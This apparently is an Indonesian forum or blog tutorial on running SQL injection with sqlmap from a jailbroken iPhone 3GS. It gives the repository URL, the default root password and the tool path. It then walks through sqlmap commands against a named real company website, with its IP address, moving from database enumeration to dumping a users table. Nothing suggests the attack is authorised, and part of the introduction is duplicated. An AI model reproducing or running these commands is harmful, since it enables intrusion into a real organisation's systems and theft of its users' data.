Assalamualaikum. Wr. Wb.
selamat malam warga Dunia Maya smua...
sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya...
proses pembuatan dan peralatan yg ane pnya...
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
3. download and install dua program ini dari cydianya langsung..
4. nah skrg masuk deh ke "Terminal Emulator" tadi.
5. login dah sebagai user ROOT caranya:
6. masuk deh ke directory sqlmapnya:
7. kita dsini pake web vuln yg udah pernah di post ama om @SaccaFrazi tritnya
8. kita mulai
kita ketik perintahnya...
9. kita coba inject
10. nah sekarang kita cari table user ato admin ato login ato apapun lah...
11. sekarang kita cari column dari tabel yang tadi kita dapet...
12. nah dah gitu kita dump deh ato mo di liat langsung juga boleh..
selamat malam warga Dunia Maya smua...
sharing ilmu kali ini (berrawal dari ide kecil ane pas lagi maen2 sama havij di komputer trus ngeliat iPhone ane dan mikir kira-kira bisa g ya sqli dari iPhone...?)
nah akhirnya ane nanya ama kakek ane yg paling pinter se jagat maya, lalu menemukan lah lanjutan ide ane ini... okey g usah banyak bacot kita langsung ke resep masakannya...
proses pembuatan dan peralatan yg ane pnya...
1. iPhone 3GS yang udah di (wajib) jailbrake
2. source reponya di tambahin dengan yg ini
PHP Code:
http://ininjas.com/repo/
PHP Code:
-Terminal Emulator-Python (biasanya dah langsung ke install)
-SQLmap
5. login dah sebagai user ROOT caranya:
PHP Code:
ketik : su <enter>password: alpine(password default root iPhone seluruh dunia...)
6. masuk deh ke directory sqlmapnya:
PHP Code:
cd /pentest/database/sqlmap; ls
PHP Code:
http://devilzc0de.org/forum/thread-459-page-23.html
PHP Code:
Analyzing http://www.pioneer-group.co.uk/event.php?id=17Host IP: 79.170.44.145
Web Server: Apache/2
Powered-by: PHP/5.2.17
kita ketik perintahnya...
PHP Code:
./sqlmap.py -h
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 --dbskita coba cari nama databasenya..
PHP Code:
./sqlmap.py -u http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer --tables
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --columns
PHP Code:
./sqlmap.py http://www.pioneer-group.co.uk/event.php?id=17 -D web145-pioneer -T PIONEER_GROUP_USERS --dump
No Comment to " sqli-lewat-iphone (baca) "